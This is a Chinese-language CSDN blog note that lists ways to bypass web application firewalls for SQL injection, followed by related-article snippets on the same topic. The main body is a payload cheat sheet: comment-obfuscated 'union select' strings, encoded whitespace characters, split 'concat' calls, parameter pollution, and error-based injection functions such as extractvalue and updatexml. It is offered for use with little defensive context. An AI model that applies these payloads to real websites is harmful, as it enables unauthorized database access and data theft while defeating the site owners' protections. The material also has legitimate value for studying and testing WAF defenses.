sql注入waf绕过

最新推荐文章于 2024-06-04 16:18:20 发布
最新推荐文章于 2024-06-04 16:18:20 发布
阅读量835 收藏 2
点赞数
分类专栏: 笔记 文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuddlylm/article/details/124206261
版权

1.架构层面绕过waf

(1)寻找源网站绕过waf检测
主要针对的是云waf,找到源网站的真实地址(可以用超级ping),进行绕过,有点像CDN
(2)通过同网段绕过waf防护
在一个网段中,可能经过的数据不会经过云waf,从而实现绕过。

2.资源限制角度绕过waf

一般waf的执行需要优先考虑业务优先的原则,所以对于构造较大、超大数据包可能不会进行检测,从而实现绕过waf。

3.协议层面绕过waf

(1)协议未覆盖绕过waf
比如由于业务需要,只对get型进行检测,post数据选择忽略
(2)参数污染
index?id=1&id=2 waf可能只对id=1进行检测

4.规则层面的绕过

(1)sql注释符绕过

union /**/select              #我们将union select之间的空格使用注释符进行替换(适用于对union select之间的空格进行检测的情况)
union/*crow%0%32#*/select                     #我们在注释符中间填充内容
union/*aaaaaaaaaabbbbbbbbbcccccccccccdddddddddddeeeeeeeeeeee%%%%%%%%%*/select                  #构造较大数据
/*!union select*/=                  #内联注释,mysql特有

(2)空白符绕过

mysql空白符:%09%0A;  %0B;  %0D;  %20;  %0C;  %A0;  /*XXX*/
正则空白符: %09%0A;  %0B;  %0D;  %20;
%25其实就是百分号  %25A0  就是空白符

(3)函数分割符号

将一个函数进行分割,例:concat()
%25其实就是百分号  %25A0  就是空白符     
concat%2520(
concat/**/(
concat%250c(
concat%25a0(
  1. 浮点数词法解释
waf对于id=1可以进行检测,但是对于id=1E0、id=1.0、id=\N可能就无法检测

5. 利用error-based(报错注入)进行sql注入

一些常用的报错注入函数

extractvalue(1, concat(0x5c,md5(3)));
updatexml(1, concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
  1. mysql 特殊语法
select {x schema_name} from {x information_schema.schemata};
select {x 1};
cyphersec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-绕过WAF以及一些注入手段
qq_25899635的博客
05-23 5248
大小写绕过   如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只对整体进行过滤。例如:and过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。可以通过修改关键字的内字母大小写来绕过过滤措施。 双写绕过   如果在程序中设置出现关键字之后替换为空,那么SQl注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了一次替换。 例如:过...
SQL注入WAF绕过
热门推荐
xdjxi的博客
03-14 1万+
SQL注入WAF绕过的基本方法 WAF绕过 WAF(Web Application Firewall)的中文名称叫做“Web应用防火墙”,它依罪女全策略对Web应用程序进行保护。安全策略是WAF的灵魂,所谓的“绕过WAF”就是指通过某种方式无视WAF的安全策略,达到攻击的目的。 方法1:变换大小写 实例:比如WAF拦截了union,那就使用Union、UnloN等方式绕过。 方法2:编码 实例1:WAF检测敏感字'~,则可以用Ox7e代替,如extractvalue(1 ,concat('~.
sql注入篇--绕过WAF
qq_51003021的博客
08-12 2072
针对WAF绕过
你不知道的那些sql注入汇总-中(绕WAF
黑战士的博客
06-04 343
目录。
SQL注入WAF绕过技巧
永远是少年
08-11 2750
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入WAF绕过技巧。 一、数据层面绕过WAF 二、方式层面绕过WAF 三、其他方式绕过WAF 四、写在最后
SQL注入绕过WAF
weixin_35753431的博客
02-13 266
SQL注入绕过WAF的方法有很多种,其中一些常见的方法包括: 使用URL编码来隐藏特殊字符,例如将“'”编码为“%27”。 使用多语句查询来绕过WAF,例如将“;”替换为“%3b”。 使用不常见的SQL关键字来绕过WAF,例如使用“version()”代替“@@version”。 使用无用代码来混淆真正的SQL语句,例如在SQL语句中添加多余的空格和注释。 使用已知的WAF绕过技巧来绕过WAF,...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAFWeb Application Firewall)的常见特征是指其具有审计...
分块传输绕过WAF进行SQL注入1
08-03
SQL注入攻击的场景中,分块传输编码可能被用来绕过Web应用防火墙(WAF)。由于WAF通常基于预定义的规则来检测和阻止恶意请求,它可能无法正确解析分块编码的请求体,从而忽略了其中可能存在的恶意SQL语句。攻击者...
SQL-WAF绕过
qq_64332865的博客
02-22 3999
实验原理 WAF (Web Application Firewall)的中文名称叫做"Web应用防火墙",通过检查HTTP的流量,它可以防御Web应用安全漏洞,如阻止SQL注入.跨站脚本(XSS)、文件包含和安全配置错误等漏洞引发的攻击。 作为攻击者来说,常见的绕过WAF的方式包括大小写变换、编码、重写、巧用注释符、巧用盲注、同功能函数替换等。 其中,重写适用于WAF只过滤一次敏感字的情况。比如 WAF过滤敏感字union. 但只过滤一次,则可以写出类似ununionion这样的,过滤一次union后就会执
sql 注入 绕过 waf
3569
07-01 4249
https://notwhy.github.io/2018/06/sql-injection-fuck-waf/0x0 前言 0x1 注入点检测 0x2 bypass waf 0x3 自动化0x0 前言  这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波...
sql注入之——常用绕过waf方式
wsnbbz的博客
02-11 1866
1.参数污染 原理: 正则表达式一般只检测第一个参数,我们可以第一个参数放正常数据流量,第二个参数放攻击数据流量 语句 http://localhost/sqli-labs-master/Less-31/login.php/?id=1111&id=-1") union select 1,2,3-- - 可以看到第二个参数执行sql语句成功,但第一个参数不可以,我们之后在1,2,3处替换sq...
mysql手工注入绕过_sql注入绕过WAF
weixin_39794734的博客
02-02 672
这几天的CTF题中有好几道题都是sql注入的,但都存在WAF需要绕过,于是整理了一些常见的绕过WAF注入的方法。在现实sql注入中我们也常常碰到WAF,那么掌握常见的绕过很有必要。0x01、手工注入绕过1、大小写混合例如:uNIoN sELecT 1,2,3,4只适用于针对大小写关键字的匹配2、替换关键字例如:UNIunionON SELselectECT 1,2,3,43、使用编码URL编码如:...
WAF攻防之SQL注入
hunanjiushen的博客
12-02 540
对已知的WAF相关绕过技术,总结如下,网上已有相关技巧的讲解,这里就不一一演示,不明白的可以自己查询相关资料:转存失败重新上传取消在实际攻击场景中,单一的绕过技巧往往无效,需要我们综合利用各种绕过技术进行组合,结合各自WAF特性不断进行推理,才能真正实现绕过。从攻击者角度来看,绕过WAF的基本方法其实不多,如何把这些已知方法融合起来,并结合各自WAF本身的防护特性,不断进行推理,成为突破WAF防护的关键。当然,自动化Fuzz才是WAF Bypass新技术产生的正道。
WAF技术以及SQL绕过
jpygx123的博客
11-10 5658
WAF的概念: WAFWeb Application Firewall)的中文名称叫做“Web应用防火墙”。 Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一种网络安全产品。WAF可以增大攻击者的攻击难度和攻击成本,但是不是100%安全的。重点: WAF是工作在应用层的; 通过特定的安全策略; 专为Web应用提供安全防护。   WAF的主...
一次SQL注入绕过WAF的实战
weixin_47204991的博客
10-25 1163
文章目录前言一、判断是否有SQL注入漏洞二、开始注入1.通过 order by语句查询网页字段常见的绕过WAF方式1.大小写绕过2.双写绕过3.编码绕过4.符号替换5.内联注释绕过6.换行跳出单行注释绕过2.通过联合查询获取数据库等信息 前言 昨天遇到了一个站点测试了很久都没有测试出来,输入错误的参数网站会有报错回显而且还有安全狗,参试了很多方法都执行不了注入的SQL语句。后面再寻找网页别的资产时发现多个页面拥有注入点,最后测试出一个页面的注入点能成功的执行出注入的SQL语句。 一、判断是否有SQL注..
sql注入绕过姿势--骚姿势大全
yggcwhat
05-07 353
sql注入绕过姿势--骚姿势大全
sql注入及其waf绕过
最新发布
06-07
为了防止SQL注入攻击和WAF绕过,开发人员应该采取以下措施: 1. 使用参数化查询或预处理语句来防止SQL注入攻击。 2. 对输入进行过滤和验证,以防止恶意输入。 3. 对敏感数据进行加密和哈希处理。 4. 使用最新版本的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值